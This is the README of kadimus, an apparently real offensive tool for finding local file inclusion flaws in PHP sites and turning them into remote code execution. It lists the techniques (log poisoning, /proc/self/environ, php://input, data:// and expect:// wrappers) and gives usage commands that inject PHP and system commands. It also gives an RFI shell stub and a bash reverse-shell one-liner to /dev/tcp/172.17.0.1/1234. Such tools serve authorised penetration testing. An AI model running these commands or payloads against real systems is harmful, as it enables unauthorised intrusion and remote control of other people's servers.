kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.
Features:
- Check all url parameters
- /var/log/auth.log RCE
- /proc/self/environ RCE
- php://input RCE
- data://text RCE
- expect://cmd RCE
- Source code disclosure
- Command shell interface through HTTP request
- Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
- Proxy socks5 support for remote connections
First, make sure you have all dependencies installed in your system: libcurl
, libopenssl
, libpcre
and libssh
.
Then you can clone the repository, to get the source code:
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus
$ make
Options:
-h, --help Display this help menu
Request:
-B, --cookie STRING Set custom HTTP cookie header
-A, --user-agent STRING User-Agent to send to server
--connect-timeout SECONDS Maximum time allowed for connection
--retry NUMBER Number of times to retry if connection fails
--proxy STRING Proxy to connect (syntax: protocol://hostname:port)
Scanner:
-u, --url STRING URL to scan/exploit
-o, --output FILE File to save output results
Explotation:
--parameter STRING Parameter name to inject exploit
(only needed by RCE data and source disclosure)
RCE:
-T, --technique=TECH LFI to RCE technique to use
-C, --code STRING Custom PHP code to execute, with php brackets
-c, --cmd STRING Execute system command on vulnerable target system
-s, --shell Simple command shell interface through HTTP request
--connect STRING IP/hostname to connect to
-p, --port NUMBER Port number to connect to or listen on
-l, --listen Bind and listen for incoming connections
--ssh-port NUMBER Set the SSH port to try command injection (default: 22)
--ssh-target STRING Set the SSH host
RCE Available techniques
environ Try to run PHP code using /proc/self/environ
input Try to run PHP code using php://input
auth Try to run PHP code using /var/log/auth.log
data Try to run PHP code using data://text
expect Try to run a command using expect://cmd
Source Disclosure:
-S, --source Try to get the source file using filter://
-f, --filename STRING Set filename to grab source [REQUIRED]
-O FILE Set output file (default: stdout)
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
You can also check for RFI errors -- just put the remote URL in resource/common_files.txt and the regex to identify them, example:
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
You can help with code, or by donating. If you want to help with code, use the kernel code style as a reference.
BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq